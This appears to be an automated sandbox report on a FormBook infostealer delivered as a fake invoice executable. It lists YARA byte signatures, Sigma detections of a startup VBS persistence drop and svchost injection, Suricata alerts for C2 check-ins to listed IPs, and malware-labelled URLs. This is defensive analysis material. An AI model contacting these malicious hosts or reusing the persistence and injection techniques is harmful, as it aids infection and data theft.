0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.1625529448.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.1635324999.0000000002B10000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.1511237211.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: name.exe PID: 3700	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xcfac0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 2768	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3b0bb:$a1: 3C 30 50 4F 53 54 74 09 40 0x19e19c:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 4132	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9c0b2:$a1: 3C 30 50 4F 53 54 74 09 40 0xabc4c:$a1: 3C 30 50 4F 53 54 74 09 40 0x11a3eb:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: name.exe PID: 2100	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xaadb0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: svchost.exe PID: 6680	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x17b:$a1: 3C 30 50 4F 53 54 74 09 40 0x109047:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: mstsc.exe PID: 4640	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x13de53:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 61 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.name.exe.b50000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.name.exe.b50000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.name.exe.b50000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.name.exe.b50000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.name.exe.b50000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
10.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
10.2.svchost.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.svchost.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
9.2.name.exe.b50000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.name.exe.b50000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.name.exe.b50000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.name.exe.b50000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.name.exe.b50000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
2.2.name.exe.1df0000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.name.exe.1df0000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.name.exe.1df0000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.name.exe.1df0000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.name.exe.1df0000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
10.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
10.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.svchost.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.svchost.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.svchost.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a19:$sqlite3step: 68 34 1C 7B E1 0x17b2c:$sqlite3step: 68 34 1C 7B E1 0x17a48:$sqlite3text: 68 38 2A 90 C5 0x17b6d:$sqlite3text: 68 38 2A 90 C5 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
2.2.name.exe.1df0000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.name.exe.1df0000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.name.exe.1df0000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.name.exe.1df0000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.name.exe.1df0000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18819:$sqlite3step: 68 34 1C 7B E1 0x1892c:$sqlite3step: 68 34 1C 7B E1 0x18848:$sqlite3text: 68 38 2A 90 C5 0x1896d:$sqlite3text: 68 38 2A 90 C5 0x1885b:$sqlite3blob: 68 53 D8 7F 8C 0x18983:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 35 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4084, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 7020, ProcessName: wscript.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3700, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ProcessId: 2768, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4084, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 7020, ProcessName: wscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ParentImage: C:\Users\user\AppData\Local\directory\name.exe, ParentProcessId: 3700, ParentProcessName: name.exe, ProcessCommandLine: "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe", ProcessId: 2768, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 3700, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 185.53.179.91

Timestamp:	2024-08-08T07:42:07.576537+0200
SID:	2031453
Severity:	1
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 3.33.130.190

Timestamp:	2024-08-08T07:41:02.068628+0200
SID:	2031453
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.8 - Destination IP: 154.23.184.95

Timestamp:	2024-08-08T07:42:54.485193+0200
SID:	2031453
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.emiratesnseic.top/jd21/	Avira URL Cloud: Label: malware
Source: http://www.apple0ficial-ld.info/jd21/Fw	Avira URL Cloud: Label: malware
